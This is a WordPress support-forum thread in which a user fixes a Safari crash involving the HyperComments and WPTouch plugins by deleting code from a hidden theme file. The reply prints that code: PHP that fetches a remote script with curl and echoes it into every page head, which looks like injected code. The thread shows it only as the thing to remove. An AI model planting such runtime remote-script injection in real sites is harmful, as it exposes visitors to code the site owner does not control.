Title: [Plugin: HyperComments] Safari Crash
Last modified: August 20, 2016

---

# [Plugin: HyperComments] Safari Crash

 *  Resolved [i0n1ca](https://wordpress.org/support/users/i0n1ca/)
 * (@i0n1ca)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/plugin-hypercomments-safari-crash/)
 * Hello,
 * Today i`ve just installed this awesome plugin. Great work guys. Keep up the good
   work.
 * So, my problem is:
    I use WPTouch plugin for mobile experience. With this kind
   of comments, when the page loads, the comments are trying to load but fails, 
   and safari exists so i can’t see my comments in my mobile version. I don’t want
   to deactivate this plugin, because i use it everyday on my iPhone, and i love
   this hypercomments too 🙂
 * My website is [http://i0n1ca.co.cc](http://i0n1ca.co.cc)
 * I wait your response to this, if there is any help, i`ll appreciate.
 * Thanks,
    Ionel.
 * [http://wordpress.org/extend/plugins/hypercomments/](http://wordpress.org/extend/plugins/hypercomments/)

Viewing 1 replies (of 1 total)

 *  Thread Starter [i0n1ca](https://wordpress.org/support/users/i0n1ca/)
 * (@i0n1ca)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/plugin-hypercomments-safari-crash/#post-2946765)
 * So, after a little digging i can say that i solved the puzzle:
 * First of all you have to navigate on cPanel (my case) to :
    `public_html/wp-content/
   themes/your_theme_name/.functions.php.wptouch` and edit the first line
 *     ```
       //SET JQUERY FUNCTIONS
       if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.6.3.min.js";$ch = curl_init();    $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
       ```
   
 * All you have to do is delete this lines.
    Now is working like a charm. WoW.

Viewing 1 replies (of 1 total)

The topic ‘[Plugin: HyperComments] Safari Crash’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/hypercomments_b1ad8b.svg)
 * [HyperComments](https://wordpress.org/plugins/hypercomments/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/hypercomments/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/hypercomments/)
 * [Active Topics](https://wordpress.org/support/plugin/hypercomments/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/hypercomments/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/hypercomments/reviews/)

## Tags

 * [Comments](https://wordpress.org/support/topic-tag/comments/)
 * [fail](https://wordpress.org/support/topic-tag/fail/)
 * [problem](https://wordpress.org/support/topic-tag/problem/)

 * 1 reply
 * 1 participant
 * Last reply from: [i0n1ca](https://wordpress.org/support/users/i0n1ca/)
 * Last activity: [13 years, 9 months ago](https://wordpress.org/support/topic/plugin-hypercomments-safari-crash/#post-2946765)
 * Status: resolved